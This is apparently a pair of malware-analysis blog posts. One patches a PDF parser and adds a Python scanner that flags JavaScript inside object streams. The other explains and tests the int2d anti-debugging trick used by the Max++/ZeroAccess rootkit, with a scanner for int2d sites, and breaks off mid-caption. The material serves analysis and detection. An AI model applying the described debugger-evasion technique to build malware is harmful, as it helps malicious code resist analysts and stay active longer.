<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFlxEwdPwe40zH84z-NoOy4pgSN5Wm6T2xEzj4iMo_IhfHfuPYT8L7kwQToTTrqk0zXJzIMSFpSBT1gY0Kz_rptIlULoCJSBBSGIz_NcQcgpNZ7jdsKWI1cRn4ljmgBwpUMieXjx41J9-U/s1600/Figure+1-10.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFlxEwdPwe40zH84z-NoOy4pgSN5Wm6T2xEzj4iMo_IhfHfuPYT8L7kwQToTTrqk0zXJzIMSFpSBT1gY0Kz_rptIlULoCJSBBSGIz_NcQcgpNZ7jdsKWI1cRn4ljmgBwpUMieXjx41J9-U/s640/Figure+1-10.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.12 - <i>Code created for pdf.py to address the missing reference number for the tag "/Names" </i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
tag variable is an array that contains the stream of the current object. Alongside the existing
check for the escape character “\\”, I added the condition “curtag == ‘Names’ ”. The statement now
also checks whether the current tag is a “/Names” tag; if it is, the parsing function
continues collecting the characters that follow the closing parenthesis, which
include the object reference number.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk09n2kMOrYDgdrqSdEawhNdpbXljgB5ICj7q1SUqooQKsj6CF2QV7ozJm331Cucx91SvwoKKTV6qBtg9ip_ZZMaAvDugitr027LwyUIajGSeiaMArkrZ7Scp9PIpUHsbwcYlQgdWOVmcR/s1600/Figure+1-13.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk09n2kMOrYDgdrqSdEawhNdpbXljgB5ICj7q1SUqooQKsj6CF2QV7ozJm331Cucx91SvwoKKTV6qBtg9ip_ZZMaAvDugitr027LwyUIajGSeiaMArkrZ7Scp9PIpUHsbwcYlQgdWOVmcR/s640/Figure+1-13.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.13 - <i>Snippet of output from the modified pdf.py for the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"><i>Figure
1.13</i> shows the new output of the modified “pdf.py” script, which now includes the
object reference as well as the text name given in the “/Names” array.</span><br />
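<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">As an added example, and not the author's pdf.py patch nor Jsunpack's code, the Python script below works through both fixes from sections 4 and 5 on a small object stream constructed inline: it unpacks a “/ObjStm” object as the section 4 patch does, splits the inflated stream into the objects it packs, reads a “/Names” array so that the string name and the reference after its closing parenthesis are both kept (the section 5 fix), and reports any packed object that carries “/JS” or “/JavaScript”. The object numbers 10, 14, 15 and 16 and the script text are assumed for illustration; this is not notwork.pdf, so the script runs offline.</span><br />
<br />
```python
import re
import zlib
# Constructed sample (not notwork.pdf): object 10 is a FlateDecode object stream
# packing object 14 (a /Names array mapping the string (My Code) to 15 0 R),
# object 15 (the JavaScript action it points at) and an unrelated object 16.
INNER_OBJECTS = {
    14: b"<< /Names [ (My Code) 15 0 R ] >>",
    15: b"<< /S /JavaScript /JS (app.alert('hello from object 15');) >>",
    16: b"<< /Type /Page /Parent 3 0 R >>",
}
# Object stream layout: a header of "objnum offset" pairs, then the objects;
# /First is the header length and each offset is relative to /First.
_header, _body = b"", b""
for _num, _data in INNER_OBJECTS.items():
    _header += b"%d %d " % (_num, len(_body))
    _body += _data + b"\n"
_deflated = zlib.compress(_header + _body)
SAMPLE_PDF_OBJECT = (
    b"10 0 obj\n<< /Type /ObjStm /N %d /First %d /Length %d /Filter /FlateDecode >>\nstream\n"
    % (len(INNER_OBJECTS), len(_header), len(_deflated))
    + _deflated + b"\nendstream\nendobj\n"
)

OBJSTM_DICT_RE = re.compile(rb"<<(.*?)>>\s*stream\r?\n", re.S)
REF_RE = re.compile(rb"\s*(\d+)\s+(\d+)\s+R")

def read_literal_string(data, start):
    """Read the literal string opening at data[start] == b'('. PDF allows balanced
    unescaped parentheses inside a string, so nesting depth is tracked; a backslash
    keeps the next byte as-is. Returns (content, index just past the closing ')')."""
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            out += data[i + 1:i + 2]
            i += 2
            continue
        depth += (c == b"(") - (c == b")")
        if depth == 0:
            return bytes(out), i + 1
        if not (c == b"(" and depth == 1):
            out += c
        i += 1
    raise ValueError("unterminated literal string")

def parse_objstm(obj_bytes):
    """Return {objnum: bytes} for the objects packed in one /ObjStm object."""
    m = OBJSTM_DICT_RE.search(obj_bytes)
    if not m or b"/ObjStm" not in m.group(1):
        return {}
    d = m.group(1)
    n, first, length = (int(re.search(rb"/%s\s+(\d+)" % k, d).group(1))
                        for k in (b"N", b"First", b"Length"))
    stream = obj_bytes[m.end():m.end() + length]
    if b"/FlateDecode" in d:
        stream = zlib.decompress(stream)  # pdf.py stopped here; what follows is the fix
    header = stream[:first].split()
    pairs = [(int(header[i]), int(header[i + 1])) for i in range(0, 2 * n, 2)]
    objects = {}
    for idx, (num, off) in enumerate(pairs):
        end = pairs[idx + 1][1] if idx + 1 < n else len(stream) - first
        objects[num] = stream[first + off:first + end].strip()
    return objects

def parse_names(dict_bytes):
    """Return [(name, objnum)] for each "(string) n g R" entry of a /Names array."""
    m = re.search(rb"/Names\s*\[", dict_bytes)
    if not m:
        return []
    i, entries = m.end(), []
    while i < len(dict_bytes) and dict_bytes[i:i + 1] != b"]":
        if dict_bytes[i:i + 1] != b"(":
            i += 1
            continue
        name, i = read_literal_string(dict_bytes, i)      # past the closing ")"
        r = REF_RE.match(dict_bytes, i)                    # keep the reference too
        if r:
            entries.append((name.decode("latin-1"), int(r.group(1))))
            i = r.end()
    return entries

def find_javascript(objects):
    """Return {objnum: script} for objects carrying /JS or /JavaScript."""
    found = {}
    for num, data in objects.items():
        if b"/JavaScript" not in data and b"/JS" not in data:
            continue
        m = re.search(rb"/JS\s*", data)
        script = b""                      # stays empty for "/JS n 0 R" or a hex string
        if m and data[m.end():m.end() + 1] == b"(":
            script, _ = read_literal_string(data, m.end())
        found[num] = script.decode("latin-1")
    return found

def scan(pdf_object_bytes):
    """Unpack one object stream and collect its /Names entries and JavaScript."""
    inner = parse_objstm(pdf_object_bytes)
    names = {n: ref for data in inner.values() for n, ref in parse_names(data)}
    return inner, names, find_javascript(inner)
```
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Calling scan(SAMPLE_PDF_OBJECT) returns the three packed objects, the mapping {"My Code": 15} and the script held by object 15. The literal-string reader tracks parenthesis depth because PDF allows balanced, unescaped parentheses inside a string: a scanner that stops at the first “)” loses whatever follows, which is exactly how the unpatched parser dropped the reference after “(My Code)”, and it would likewise truncate a script containing app.alert(...).</span><br />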
<br />
<span style="font-size: large;"><b>6. References</b></span><br />
[1] Jsunpack, Available at <a href="http://code.google.com/p/jsunpack-n/">http://code.google.com/p/jsunpack-n/</a><br />
[2] Pdfstreamdumper, Available at <a href="http://sandsprite.com/blogs/index.php?uid=7&pid=57">http://sandsprite.com/blogs/index.php?uid=7&pid=57</a><br />
[3] Pdf Document Reference, Available at <a href="http://www.adobe.com/devnet/pdf/pdf_reference.html">http://www.adobe.com/devnet/pdf/pdf_reference.html</a>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-8501561183307667545.post-61998551368196715562012-03-20T00:00:00.000-07:002012-04-09T20:38:22.360-07:00ZeroAccess Rootkit - Part 2<b><span style="font-size: large;">1. Debuggers</span></b><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Debugging an application means detecting and removing bugs from it. Debuggers are essential in software development because they help quickly identify a syntactic or logic error in a program. In malware analysis, debuggers are used to study how malicious code works in order to devise a method of detection and removal. Debuggers are also used by software pirates who reverse engineer popular software to find ways to remove the protections put in place by the application developers. Because of software pirates and their use of debuggers, developers employ anti-debugging techniques as a deterrent to those who reverse engineer their code. There is no complete solution that stops a committed reverse engineer; however, anti-debugging techniques make the process more difficult, require a higher level of expertise to bypass, and increase the time needed to analyze an application [2]. Just as application developers use anti-debugging techniques as a layer of protection for their software, malware authors adopt the same techniques for the malware they create. In this scenario the anti-debugging techniques serve as a deterrent to malware analysts. The purpose is to prevent accurate analysis of the malicious code and, in effect, to increase the lifespan of the malware.</span></div>
<br />
<span style="font-size: large;"><b>2. Dynamic Behavior of Int2d</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Many anti-debugging techniques exist; this section concentrates on the int2d instruction because it is used frequently in the Max++ rootkit. Interrupt 2d is reserved for the Windows kernel debugging service. Executing it raises a breakpoint exception to be handled by the kernel debugger; if no kernel debugger handles the exception, it is passed on to user-level exception handling. When an int2d is executed, the exception address is taken from the EIP register. EIP is the instruction pointer and always holds the address of the next instruction. After the exception address has been recorded from EIP, EIP is incremented by one byte. The breakpoint exception is then raised and is either handled or not handled by an exception handler. When no debugger is attached to the system, execution resumes at the address of the exception; it continues normally because the exception is assumed to have been corrected and the process can carry on from the exception address. If a debugger is present, the program continues at the EIP address, which is one byte after the exception address. The program skips one byte, which is known as a byte scission.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Because the observed behavior of the int2d instruction differs between these cases, it can be used to determine whether a debugger is present on the system. Also, since one byte is skipped, the instruction can be used to change the execution path of a program depending on the debugging environment: a program may run differently with a debugger attached than without one. This technique is problematic for malware analysis.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">This section also explores the dynamic nature of the int2d instruction. Its behavior is more complex than it first appears, and the factors that change it are numerous: the value of the EAX register, the structured exception handling in place, whether a user-level debugger is present, and whether a kernel-level debugger is attached. Different behaviors can be observed with different combinations of these factors. An experimental approach is followed to examine the changes in behavior exhibited by int2d.</span></div>
<br />
<span style="font-size: large;"><b>3. Int2d Experiment Design</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">To analyze the int2d instruction, the C program in Figure 2.2 is used. Written by Dr. Xiang Fu [1], the Int2dExp.cc program is used here to perform experiments with the int2d instruction. The file is compiled into an executable that is later debugged. The program consists of two print statements: the first prints the characters “AAAA” and the second prints the characters “BBBB”. Local variables are also included in the code to leave room for inserting assembly instructions in a debugger. Immunity Debugger lets us debug the executable and modify its assembly instructions.</span></div>
<div style="text-align: justify;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5I9YuJ6YBtlYbhUNLYiOpGguP_keiE5k-TyP2Pn3wrsz95EiAhccoxQ-bPPzYcYfFX_1b2aZNN4egVeZ1tA3YHnNPBVJfXoPxXQZRpN9Q7Fcs6QoueUa0BAtzgarsqa6JUKztGiww0y4F/s1600/Figure+2-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5I9YuJ6YBtlYbhUNLYiOpGguP_keiE5k-TyP2Pn3wrsz95EiAhccoxQ-bPPzYcYfFX_1b2aZNN4egVeZ1tA3YHnNPBVJfXoPxXQZRpN9Q7Fcs6QoueUa0BAtzgarsqa6JUKztGiww0y4F/s1600/Figure+2-2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.2 – <i>C code for Int2dExp.cc</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Figure 2.3 shows the int2dexp binary opened in Immunity Debugger. The important section of the assembly is shown below. From address “004010DA” to “004010EF” the variables “a” through “d” are initialized. The next two lines store the value “AAAA” and display it by calling the “printf” function from “cygwin.dll” at address “004010FD”. The second print statement is located at address “00401125” and displays the characters “BBBB”.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_0upPHJuk7gCgK4RVjtfJv28s07aegI8BG3u6Cbe5BJK6WKjYqOSb0xCuPxqAynxySLzOpzBdYnT6DAQ9aiFccmd9DCsDcpB993c42KaC_rbuNJkfTKIa1mc9IJO6G4Omga6AAMFIBJ_h/s1600/Figure+2-3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_0upPHJuk7gCgK4RVjtfJv28s07aegI8BG3u6Cbe5BJK6WKjYqOSb0xCuPxqAynxySLzOpzBdYnT6DAQ9aiFccmd9DCsDcpB993c42KaC_rbuNJkfTKIa1mc9IJO6G4Omga6AAMFIBJ_h/s640/Figure+2-3.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.3 – <i>Assembly</i> <i>instructions shown in Immunity debugger for int2dexp executable</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The instructions are modified to incorporate the int2d instruction. To test the different behaviors we write an int2d instruction over the previous initialization of the variables. The int2d is followed by a one-byte instruction, “INC EAX”. To test whether the byte after int2d is skipped we add a “CMP” and a “JE” instruction. “CMP” compares two values and sets the zero flag (ZF): it subtracts one operand from the other, and if they are equal the result is zero and ZF is set to one; if they are not equal, ZF is cleared to zero. “JE” (jump if equal, also written JZ, jump if zero) depends on ZF: if the two compared values are equal, ZF is one and the jump to the specified address is taken. The “JE” instruction therefore lets us see whether int2d causes a byte scission. Figure 2.4 shows the modified int2dexp with the EAX register set to one. If a byte is skipped, the “INC EAX” instruction is not executed, EAX retains its value, the two operands of “CMP” are equal, the jump is taken and execution goes from address “0040110D” to “0040112A”. The jump target is right after the second print statement, so the characters “BBBB” are never displayed; Figure 2.4 shows only “AAAA” being printed.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM6myiWCKLgYl-YLy16bftjEo0B8Uhyphenhyphen6N_OwDTcZPUiw353sqkPT4zmUiDvSGkenVj0hWw3u9FCkGw0Q1W6xvBGvJTv6g_P4eFjaGB6pIBHdyGOVXi6mBKUWn2CEIuJmpl7kuby-hj-ZX/s1600/Figure+2-4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM6myiWCKLgYl-YLy16bftjEo0B8Uhyphenhyphen6N_OwDTcZPUiw353sqkPT4zmUiDvSGkenVj0hWw3u9FCkGw0Q1W6xvBGvJTv6g_P4eFjaGB6pIBHdyGOVXi6mBKUWn2CEIuJmpl7kuby-hj-ZX/s640/Figure+2-4.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.4 - <i>Assembly instructions in Immunity debugger for int2dexp where EAX equals one and the JE is included</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Another way to run the same experiment is to replace the “JE” instruction with “JNZ”. “JNZ” (jump if not zero, equivalently JNE) does the exact opposite of “JE”: if the two compared values are not equal, it jumps to the specified address. For the example above, replacing JE with JNZ makes the program display “AAAABBBB” instead of only “AAAA”. The “JNZ” variant can be seen in Figure 2.5.</span></div>
<div style="text-align: justify;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJZ2gLq-R-wW0rK-3CqFc7Al1K2VJ5snMlWXc-9-bzUKXACwYp7axt2G0RLm97c4v-KQH8NPE0cDY9W1T_wJ2QEI_qBmw2zz2xkb4TvUu2f5npCy_uoN4cUrYa9SiVisf3183S2UuFPAZe/s1600/Figure+2-5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJZ2gLq-R-wW0rK-3CqFc7Al1K2VJ5snMlWXc-9-bzUKXACwYp7axt2G0RLm97c4v-KQH8NPE0cDY9W1T_wJ2QEI_qBmw2zz2xkb4TvUu2f5npCy_uoN4cUrYa9SiVisf3183S2UuFPAZe/s640/Figure+2-5.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.5 – Assembly instructions in Immunity debugger for int2dexp where EAX equals one and JNZ is included</span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The program above lets us test the int2d behavior against two factors. The first is the debugging environment: execution is examined with a user-level debugger attached, with a kernel-level debugger attached, and with no debugger attached. The second factor is the value of the EAX register, which is easily changed by editing the immediate at address “00401102”. Figure 2.6 shows an example where EAX is set to the value two.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRMjYFmNSZqoLp40aHkNhI3GThMACB-VBVEOyonz9HejQTbbAiqbB44bMgjS18P4Bcf0lSOqac_WGnJu-AxPm97hx-nh1yPFyKLg3KtAdzqp_bo4_W9x75VbVQwmmXPuHTmwPTCplcg3Lw/s1600/Figure+2-6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRMjYFmNSZqoLp40aHkNhI3GThMACB-VBVEOyonz9HejQTbbAiqbB44bMgjS18P4Bcf0lSOqac_WGnJu-AxPm97hx-nh1yPFyKLg3KtAdzqp_bo4_W9x75VbVQwmmXPuHTmwPTCplcg3Lw/s640/Figure+2-6.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.6 - Assembly instructions in Immunity debugger for int2dexp where EAX equals two and JE is included</span></td></tr>
</tbody></table>
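<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">As an added example that is not part of the original post and not the author's int2dexp program, the Python scanner below looks in raw 32-bit code for the instruction pattern set up in this section: the load of EAX, the “int 2d”, the one-byte instruction that a byte scission would skip, and the “CMP EAX”/“JE” or “JNZ” pair that reacts to it. It then predicts, following the reasoning above, whether the branch is taken when that byte is skipped and when it is executed. The sample bytes and the base address 0x401100 are constructed for illustration and are not taken from the author's binary.</span></div>
<br />
```python
import struct

# Opcode facts used below (32-bit x86): B8 imm32 = MOV EAX,imm32; 31 C0 and
# 33 C0 = XOR EAX,EAX; CD 2D = INT 2Dh; 40 = INC EAX; 48 = DEC EAX; 90 = NOP;
# 83 F8 ib = CMP EAX,imm8; 74 rel8 = JE/JZ; 75 rel8 = JNE/JNZ.
INT2D = b"\xcd\x2d"
ONE_BYTE_INSNS = {0x40: ("inc eax", 1), 0x48: ("dec eax", -1), 0x90: ("nop", 0)}
JCC8 = {0x74: "je", 0x75: "jne"}

# Constructed sample laid out like the modified int2dexp described in the post
# (assumed base 0x401100; these are not bytes taken from the author's binary).
SAMPLE = (
    b"\xb8\x01\x00\x00\x00"   # mov eax, 1
    b"\xcd\x2d"               # int 2Dh
    b"\x40"                   # inc eax   <- the byte a scission skips
    b"\x83\xf8\x01"           # cmp eax, 1
    b"\x74\x05"               # je +5, over the second print
    b"\xe8\x00\x00\x00\x00"   # call rel32, stand-in for printf("BBBB")
    b"\xc3"                   # ret
    b"\x31\xc0"               # xor eax, eax   second site, no branch after it
    b"\xcd\x2d"               # int 2Dh
    b"\x90"                   # nop
)


def eax_before(code, pos):
    """Constant loaded into EAX by the instruction ending at pos, or None."""
    if pos >= 5 and code[pos - 5] == 0xB8:
        return struct.unpack_from("<I", code, pos - 4)[0]
    if pos >= 2 and code[pos - 2:pos] in (b"\x31\xc0", b"\x33\xc0"):
        return 0
    return None


def find_int2d_sites(code, base=0):
    """Scan raw 32-bit code for INT 2D sites. Each result records the EAX value
    set up beforehand, the one-byte instruction a byte scission would skip, and
    the CMP EAX,imm8 / short Jcc pair that follows it, if any."""
    sites, start = [], 0
    while True:
        pos = code.find(INT2D, start)
        if pos < 0:
            return sites
        start = pos + 1
        after = pos + 2                      # EIP once INT 2D itself is done
        site = {"va": base + pos, "eax": eax_before(code, pos), "skipped": None,
                "eax_delta": 0, "cmp_imm": None, "branch": None}
        if after < len(code):
            name, delta = ONE_BYTE_INSNS.get(code[after], ("db 0x%02x" % code[after], 0))
            site["skipped"], site["eax_delta"] = name, delta
        j = after + 1                        # where execution lands after a scission
        if code[j:j + 2] == b"\x83\xf8" and j + 4 < len(code) and code[j + 3] in JCC8:
            imm = code[j + 2]
            site["cmp_imm"] = imm - 0x100 if imm >= 0x80 else imm   # imm8 is sign-extended
            rel = struct.unpack_from("<b", code, j + 4)[0]
            site["branch"] = (JCC8[code[j + 3]], base + j + 5 + rel)
        sites.append(site)


def branch_taken(site, scission):
    """Predict whether the site's Jcc is taken when the byte after INT 2D is
    skipped (scission=True) or executed (scission=False); None if unknown."""
    if site["eax"] is None or site["branch"] is None:
        return None
    eax = (site["eax"] + (0 if scission else site["eax_delta"])) & 0xFFFFFFFF
    equal = eax == (site["cmp_imm"] & 0xFFFFFFFF)
    return equal if site["branch"][0] == "je" else not equal


if __name__ == "__main__":
    for s in find_int2d_sites(SAMPLE, base=0x401100):
        print("int 2d at %08x: eax=%r, skips %r, branch=%r, taken if skipped=%r, "
              "taken if executed=%r" % (s["va"], s["eax"], s["skipped"], s["branch"],
                                        branch_taken(s, True), branch_taken(s, False)))
```
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The scanner decodes only the handful of opcodes the pattern needs (B8 imm32, XOR EAX,EAX, CD 2D, the one-byte INC/DEC/NOP, 83 F8 ib and the short JE/JNZ), so it is a triage aid for spotting int2d sites in a dump rather than a disassembler. On the sample, the first site branches over the second print only in the scission case, which is the “AAAA” versus “AAAABBBB” difference the experiments measure; the second site has no branch, so branch_taken returns None for it.</span></div>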
<br />
<span style="font-size: large;"><b>4. Int2d Experiment Configuration</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">A VirtualBox image of Windows XP SP2 was used as the system under test; it is referred to as the host system in what follows. A Windows 7 Home Edition system, referred to as the guest, ran WinDbg against it over a virtual serial port. Debugging tools were installed on both systems. Below is the VirtualBox serial port configuration for the host system.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPEzTVTAtX_ViaZtpfPa6pOQYbu_aDViIncA8hfDra5rMIcl1w-TwI2nM6j1k66POQZXBabfV_8s4Brgzxe0VkL4l7jmlePPgCm47wVt_Tm6f2Cphqw7Gnb_Sn-GfBL6pv4xBonhQtxRDw/s1600/Figure+2-7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPEzTVTAtX_ViaZtpfPa6pOQYbu_aDViIncA8hfDra5rMIcl1w-TwI2nM6j1k66POQZXBabfV_8s4Brgzxe0VkL4l7jmlePPgCm47wVt_Tm6f2Cphqw7Gnb_Sn-GfBL6pv4xBonhQtxRDw/s400/Figure+2-7.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.7 – <i>Serial port configuration for the windows host system</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Figure 2.8 displays the command issued to start a WinDbg kernel-debugging session from the Windows SDK command prompt. The port must match the VirtualBox serial configuration shown above.</span></div>
<div style="text-align: justify;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM7MBZsDZQ9XQcwOekek2VHKBvg1daN2PJr17isy4dvK0cqNP3idCbbAAkqop45bQpkYTCEu5HFrqb8GluUK5-F9rPD1L2dp7H3h1iJToKCZfLjbv_mj2qUarmjL2xYRREVipVAXsYv6dn/s1600/Figure+2-8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM7MBZsDZQ9XQcwOekek2VHKBvg1daN2PJr17isy4dvK0cqNP3idCbbAAkqop45bQpkYTCEu5HFrqb8GluUK5-F9rPD1L2dp7H3h1iJToKCZfLjbv_mj2qUarmjL2xYRREVipVAXsYv6dn/s640/Figure+2-8.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.8 – <i>Windows SDK 7.1 Command prompt and command to connect to host system</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">A successful connection to the host machine presents the window shown below in Figure 2.9. WinDbg breaks into the target with an “int 3” breakpoint by default when it first connects, and the command “g”, which stands for go, resumes execution of the host system.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJAJFBFMu6VAsDiCPEIsiRGEN24QIS4lNVwt87zrX5lAM29Ehwwu9JPw4jZk_n-BAz73SEUYLeZ2TVWRajHHJtMeDwokpQdLxY5mDvNQh2NHXugWZ6BrruUdkeoJNKb_evHn6qDXxXbIbz/s1600/Figure+2-9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="568" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJAJFBFMu6VAsDiCPEIsiRGEN24QIS4lNVwt87zrX5lAM29Ehwwu9JPw4jZk_n-BAz73SEUYLeZ2TVWRajHHJtMeDwokpQdLxY5mDvNQh2NHXugWZ6BrruUdkeoJNKb_evHn6qDXxXbIbz/s640/Figure+2-9.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.9 – <i>A successful connection established in WinDbg</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The same command is used to continue execution of the host machine after an exception has been raised and the host system is waiting for it to be handled. It is used throughout the following experiments.</span></div>
<br />
<span style="font-size: large;"><b>5. Int2d Experiment Results</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Figure 2.10 presents the results of the experiments with the int2d instruction. The values 1, 2, 3, 4 and 99 are used for the EAX register, and the int2dprint program is executed in the different debugging environments listed in the figure.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFnXxpkMhacjPF2tOadp5vvaDu5ifCFaFY6HlwLb8xCLgiobqsBcevWn_xUqrDTv8E1YihYQlUgF14ThS2JKTzfxd0UT_gfLz_iw8RZs8_0_0yhJzgFROd2Jc7V4sM5odQOra00RcZ2kLq/s1600/Figure+2-10.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="479" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFnXxpkMhacjPF2tOadp5vvaDu5ifCFaFY6HlwLb8xCLgiobqsBcevWn_xUqrDTv8E1YihYQlUgF14ThS2JKTzfxd0UT_gfLz_iw8RZs8_0_0yhJzgFROd2Jc7V4sM5odQOra00RcZ2kLq/s640/Figure+2-10.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: left;"><i><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.10</span></i><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;"> - Results for executing int2dexp.exe in various debugging environments and with different values for the <br />
